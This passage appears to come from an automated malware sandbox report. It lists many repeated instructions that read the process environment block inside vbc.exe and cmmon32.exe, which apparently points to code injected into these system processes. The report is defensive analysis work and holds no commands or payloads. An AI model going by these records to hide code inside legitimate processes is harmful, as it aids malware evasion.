Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05590050 mov eax, dword ptr fs:[00000030h] 4_2_05590050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05590050 mov eax, dword ptr fs:[00000030h] 4_2_05590050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05632073 mov eax, dword ptr fs:[00000030h] 4_2_05632073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05641074 mov eax, dword ptr fs:[00000030h] 4_2_05641074
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055F7016 mov eax, dword ptr fs:[00000030h] 4_2_055F7016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055F7016 mov eax, dword ptr fs:[00000030h] 4_2_055F7016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055F7016 mov eax, dword ptr fs:[00000030h] 4_2_055F7016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0559A830 mov eax, dword ptr fs:[00000030h] 4_2_0559A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0559A830 mov eax, dword ptr fs:[00000030h] 4_2_0559A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0559A830 mov eax, dword ptr fs:[00000030h] 4_2_0559A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0559A830 mov eax, dword ptr fs:[00000030h] 4_2_0559A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05644015 mov eax, dword ptr fs:[00000030h] 4_2_05644015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05644015 mov eax, dword ptr fs:[00000030h] 4_2_05644015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0558B02A mov eax, dword ptr fs:[00000030h] 4_2_0558B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0558B02A mov eax, dword ptr fs:[00000030h] 4_2_0558B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0558B02A mov eax, dword ptr fs:[00000030h] 4_2_0558B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0558B02A mov eax, dword ptr fs:[00000030h] 4_2_0558B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A002D mov eax, dword ptr fs:[00000030h] 4_2_055A002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A002D mov eax, dword ptr fs:[00000030h] 4_2_055A002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A002D mov eax, dword ptr fs:[00000030h] 4_2_055A002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A002D mov eax, dword ptr fs:[00000030h] 4_2_055A002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A002D mov eax, dword ptr fs:[00000030h] 4_2_055A002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0560B8D0 mov eax, dword ptr fs:[00000030h] 4_2_0560B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0560B8D0 mov ecx, dword ptr fs:[00000030h] 4_2_0560B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0560B8D0 mov eax, dword ptr fs:[00000030h] 4_2_0560B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0560B8D0 mov eax, dword ptr fs:[00000030h] 4_2_0560B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0560B8D0 mov eax, dword ptr fs:[00000030h] 4_2_0560B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0560B8D0 mov eax, dword ptr fs:[00000030h] 4_2_0560B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055740E1 mov eax, dword ptr fs:[00000030h] 4_2_055740E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055740E1 mov eax, dword ptr fs:[00000030h] 4_2_055740E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055740E1 mov eax, dword ptr fs:[00000030h] 4_2_055740E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055758EC mov eax, dword ptr fs:[00000030h] 4_2_055758EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0559B8E4 mov eax, dword ptr fs:[00000030h] 4_2_0559B8E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0559B8E4 mov eax, dword ptr fs:[00000030h] 4_2_0559B8E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05579080 mov eax, dword ptr fs:[00000030h] 4_2_05579080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055F3884 mov eax, dword ptr fs:[00000030h] 4_2_055F3884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055F3884 mov eax, dword ptr fs:[00000030h] 4_2_055F3884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055AF0BF mov ecx, dword ptr fs:[00000030h] 4_2_055AF0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055AF0BF mov eax, dword ptr fs:[00000030h] 4_2_055AF0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055AF0BF mov eax, dword ptr fs:[00000030h] 4_2_055AF0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B90AF mov eax, dword ptr fs:[00000030h] 4_2_055B90AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A20A0 mov eax, dword ptr fs:[00000030h] 4_2_055A20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A20A0 mov eax, dword ptr fs:[00000030h] 4_2_055A20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A20A0 mov eax, dword ptr fs:[00000030h] 4_2_055A20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A20A0 mov eax, dword ptr fs:[00000030h] 4_2_055A20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A20A0 mov eax, dword ptr fs:[00000030h] 4_2_055A20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A20A0 mov eax, dword ptr fs:[00000030h] 4_2_055A20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0557F358 mov eax, dword ptr fs:[00000030h] 4_2_0557F358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0557DB40 mov eax, dword ptr fs:[00000030h] 4_2_0557DB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A3B7A mov eax, dword ptr fs:[00000030h] 4_2_055A3B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A3B7A mov eax, dword ptr fs:[00000030h] 4_2_055A3B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0557DB60 mov ecx, dword ptr fs:[00000030h] 4_2_0557DB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05648B58 mov eax, dword ptr fs:[00000030h] 4_2_05648B58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0563131B mov eax, dword ptr fs:[00000030h] 4_2_0563131B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055F53CA mov eax, dword ptr fs:[00000030h] 4_2_055F53CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055F53CA mov eax, dword ptr fs:[00000030h] 4_2_055F53CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0559DBE9 mov eax, dword ptr fs:[00000030h] 4_2_0559DBE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A03E2 mov eax, dword ptr fs:[00000030h] 4_2_055A03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A03E2 mov eax, dword ptr fs:[00000030h] 4_2_055A03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A03E2 mov eax, dword ptr fs:[00000030h] 4_2_055A03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A03E2 mov eax, dword ptr fs:[00000030h] 4_2_055A03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A03E2 mov eax, dword ptr fs:[00000030h] 4_2_055A03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A03E2 mov eax, dword ptr fs:[00000030h] 4_2_055A03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05645BA5 mov eax, dword ptr fs:[00000030h] 4_2_05645BA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055AB390 mov eax, dword ptr fs:[00000030h] 4_2_055AB390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A2397 mov eax, dword ptr fs:[00000030h] 4_2_055A2397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05581B8F mov eax, dword ptr fs:[00000030h] 4_2_05581B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05581B8F mov eax, dword ptr fs:[00000030h] 4_2_05581B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0562D380 mov ecx, dword ptr fs:[00000030h] 4_2_0562D380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0563138A mov eax, dword ptr fs:[00000030h] 4_2_0563138A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A4BAD mov eax, dword ptr fs:[00000030h] 4_2_055A4BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A4BAD mov eax, dword ptr fs:[00000030h] 4_2_055A4BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A4BAD mov eax, dword ptr fs:[00000030h] 4_2_055A4BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0562B260 mov eax, dword ptr fs:[00000030h] 4_2_0562B260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0562B260 mov eax, dword ptr fs:[00000030h] 4_2_0562B260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05648A62 mov eax, dword ptr fs:[00000030h] 4_2_05648A62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05579240 mov eax, dword ptr fs:[00000030h] 4_2_05579240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05579240 mov eax, dword ptr fs:[00000030h] 4_2_05579240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05579240 mov eax, dword ptr fs:[00000030h] 4_2_05579240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05579240 mov eax, dword ptr fs:[00000030h] 4_2_05579240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B927A mov eax, dword ptr fs:[00000030h] 4_2_055B927A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0563EA55 mov eax, dword ptr fs:[00000030h] 4_2_0563EA55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05604257 mov eax, dword ptr fs:[00000030h] 4_2_05604257
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0557AA16 mov eax, dword ptr fs:[00000030h] 4_2_0557AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0557AA16 mov eax, dword ptr fs:[00000030h] 4_2_0557AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05593A1C mov eax, dword ptr fs:[00000030h] 4_2_05593A1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05575210 mov eax, dword ptr fs:[00000030h] 4_2_05575210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05575210 mov ecx, dword ptr fs:[00000030h] 4_2_05575210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05575210 mov eax, dword ptr fs:[00000030h] 4_2_05575210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05575210 mov eax, dword ptr fs:[00000030h] 4_2_05575210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05588A0A mov eax, dword ptr fs:[00000030h] 4_2_05588A0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0559A229 mov eax, dword ptr fs:[00000030h] 4_2_0559A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0559A229 mov eax, dword ptr fs:[00000030h] 4_2_0559A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0559A229 mov eax, dword ptr fs:[00000030h] 4_2_0559A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0559A229 mov eax, dword ptr fs:[00000030h] 4_2_0559A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0559A229 mov eax, dword ptr fs:[00000030h] 4_2_0559A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0559A229 mov eax, dword ptr fs:[00000030h] 4_2_0559A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0559A229 mov eax, dword ptr fs:[00000030h] 4_2_0559A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0559A229 mov eax, dword ptr fs:[00000030h] 4_2_0559A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0559A229 mov eax, dword ptr fs:[00000030h] 4_2_0559A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0563AA16 mov eax, dword ptr fs:[00000030h] 4_2_0563AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0563AA16 mov eax, dword ptr fs:[00000030h] 4_2_0563AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B4A2C mov eax, dword ptr fs:[00000030h] 4_2_055B4A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B4A2C mov eax, dword ptr fs:[00000030h] 4_2_055B4A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A2ACB mov eax, dword ptr fs:[00000030h] 4_2_055A2ACB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A2AE4 mov eax, dword ptr fs:[00000030h] 4_2_055A2AE4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055AD294 mov eax, dword ptr fs:[00000030h] 4_2_055AD294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055AD294 mov eax, dword ptr fs:[00000030h] 4_2_055AD294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0558AAB0 mov eax, dword ptr fs:[00000030h] 4_2_0558AAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0558AAB0 mov eax, dword ptr fs:[00000030h] 4_2_0558AAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055AFAB0 mov eax, dword ptr fs:[00000030h] 4_2_055AFAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055752A5 mov eax, dword ptr fs:[00000030h] 4_2_055752A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055752A5 mov eax, dword ptr fs:[00000030h] 4_2_055752A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055752A5 mov eax, dword ptr fs:[00000030h] 4_2_055752A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055752A5 mov eax, dword ptr fs:[00000030h] 4_2_055752A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055752A5 mov eax, dword ptr fs:[00000030h] 4_2_055752A5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A6849B mov eax, dword ptr fs:[00000030h] 17_2_04A6849B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B114FB mov eax, dword ptr fs:[00000030h] 17_2_04B114FB
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AD6CF0 mov eax, dword ptr fs:[00000030h] 17_2_04AD6CF0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AD6CF0 mov eax, dword ptr fs:[00000030h] 17_2_04AD6CF0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AD6CF0 mov eax, dword ptr fs:[00000030h] 17_2_04AD6CF0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B28CD6 mov eax, dword ptr fs:[00000030h] 17_2_04B28CD6
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8BC2C mov eax, dword ptr fs:[00000030h] 17_2_04A8BC2C
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AD6C0A mov eax, dword ptr fs:[00000030h] 17_2_04AD6C0A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AD6C0A mov eax, dword ptr fs:[00000030h] 17_2_04AD6C0A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AD6C0A mov eax, dword ptr fs:[00000030h] 17_2_04AD6C0A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AD6C0A mov eax, dword ptr fs:[00000030h] 17_2_04AD6C0A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B11C06 mov eax, dword ptr fs:[00000030h] 17_2_04B11C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B11C06 mov eax, dword ptr fs:[00000030h] 17_2_04B11C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B11C06 mov eax, dword ptr fs:[00000030h] 17_2_04B11C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B11C06 mov eax, dword ptr fs:[00000030h] 17_2_04B11C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B11C06 mov eax, dword ptr fs:[00000030h] 17_2_04B11C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B11C06 mov eax, dword ptr fs:[00000030h] 17_2_04B11C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B11C06 mov eax, dword ptr fs:[00000030h] 17_2_04B11C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B11C06 mov eax, dword ptr fs:[00000030h] 17_2_04B11C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B11C06 mov eax, dword ptr fs:[00000030h] 17_2_04B11C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B11C06 mov eax, dword ptr fs:[00000030h] 17_2_04B11C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B11C06 mov eax, dword ptr fs:[00000030h] 17_2_04B11C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B11C06 mov eax, dword ptr fs:[00000030h] 17_2_04B11C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B11C06 mov eax, dword ptr fs:[00000030h] 17_2_04B11C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B11C06 mov eax, dword ptr fs:[00000030h] 17_2_04B11C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B2740D mov eax, dword ptr fs:[00000030h] 17_2_04B2740D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B2740D mov eax, dword ptr fs:[00000030h] 17_2_04B2740D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B2740D mov eax, dword ptr fs:[00000030h] 17_2_04B2740D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A7746D mov eax, dword ptr fs:[00000030h] 17_2_04A7746D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8AC7B mov eax, dword ptr fs:[00000030h] 17_2_04A8AC7B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8AC7B mov eax, dword ptr fs:[00000030h] 17_2_04A8AC7B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8AC7B mov eax, dword ptr fs:[00000030h] 17_2_04A8AC7B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8AC7B mov eax, dword ptr fs:[00000030h] 17_2_04A8AC7B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8AC7B mov eax, dword ptr fs:[00000030h] 17_2_04A8AC7B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8AC7B mov eax, dword ptr fs:[00000030h] 17_2_04A8AC7B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8AC7B mov eax, dword ptr fs:[00000030h] 17_2_04A8AC7B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8AC7B mov eax, dword ptr fs:[00000030h] 17_2_04A8AC7B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8AC7B mov eax, dword ptr fs:[00000030h] 17_2_04A8AC7B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8AC7B mov eax, dword ptr fs:[00000030h] 17_2_04A8AC7B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8AC7B mov eax, dword ptr fs:[00000030h] 17_2_04A8AC7B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8A44B mov eax, dword ptr fs:[00000030h] 17_2_04A8A44B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AEC450 mov eax, dword ptr fs:[00000030h] 17_2_04AEC450
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AEC450 mov eax, dword ptr fs:[00000030h] 17_2_04AEC450
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A835A1 mov eax, dword ptr fs:[00000030h] 17_2_04A835A1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A81DB5 mov eax, dword ptr fs:[00000030h] 17_2_04A81DB5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A81DB5 mov eax, dword ptr fs:[00000030h] 17_2_04A81DB5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A81DB5 mov eax, dword ptr fs:[00000030h] 17_2_04A81DB5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B205AC mov eax, dword ptr fs:[00000030h] 17_2_04B205AC
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B205AC mov eax, dword ptr fs:[00000030h] 17_2_04B205AC
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A82581 mov eax, dword ptr fs:[00000030h] 17_2_04A82581
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A82581 mov eax, dword ptr fs:[00000030h] 17_2_04A82581
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A82581 mov eax, dword ptr fs:[00000030h] 17_2_04A82581
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A82581 mov eax, dword ptr fs:[00000030h] 17_2_04A82581
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A52D8A mov eax, dword ptr fs:[00000030h] 17_2_04A52D8A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A52D8A mov eax, dword ptr fs:[00000030h] 17_2_04A52D8A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A52D8A mov eax, dword ptr fs:[00000030h] 17_2_04A52D8A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A52D8A mov eax, dword ptr fs:[00000030h] 17_2_04A52D8A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A52D8A mov eax, dword ptr fs:[00000030h] 17_2_04A52D8A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8FD9B mov eax, dword ptr fs:[00000030h] 17_2_04A8FD9B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8FD9B mov eax, dword ptr fs:[00000030h] 17_2_04A8FD9B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B08DF1 mov eax, dword ptr fs:[00000030h] 17_2_04B08DF1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A6D5E0 mov eax, dword ptr fs:[00000030h] 17_2_04A6D5E0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A6D5E0 mov eax, dword ptr fs:[00000030h] 17_2_04A6D5E0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B1FDE2 mov eax, dword ptr fs:[00000030h] 17_2_04B1FDE2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B1FDE2 mov eax, dword ptr fs:[00000030h] 17_2_04B1FDE2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B1FDE2 mov eax, dword ptr fs:[00000030h] 17_2_04B1FDE2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B1FDE2 mov eax, dword ptr fs:[00000030h] 17_2_04B1FDE2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AD6DC9 mov eax, dword ptr fs:[00000030h] 17_2_04AD6DC9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AD6DC9 mov eax, dword ptr fs:[00000030h] 17_2_04AD6DC9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AD6DC9 mov eax, dword ptr fs:[00000030h] 17_2_04AD6DC9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AD6DC9 mov ecx, dword ptr fs:[00000030h] 17_2_04AD6DC9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AD6DC9 mov eax, dword ptr fs:[00000030h] 17_2_04AD6DC9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AD6DC9 mov eax, dword ptr fs:[00000030h] 17_2_04AD6DC9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B28D34 mov eax, dword ptr fs:[00000030h] 17_2_04B28D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B1E539 mov eax, dword ptr fs:[00000030h] 17_2_04B1E539
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A63D34 mov eax, dword ptr fs:[00000030h] 17_2_04A63D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A63D34 mov eax, dword ptr fs:[00000030h] 17_2_04A63D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A63D34 mov eax, dword ptr fs:[00000030h] 17_2_04A63D34
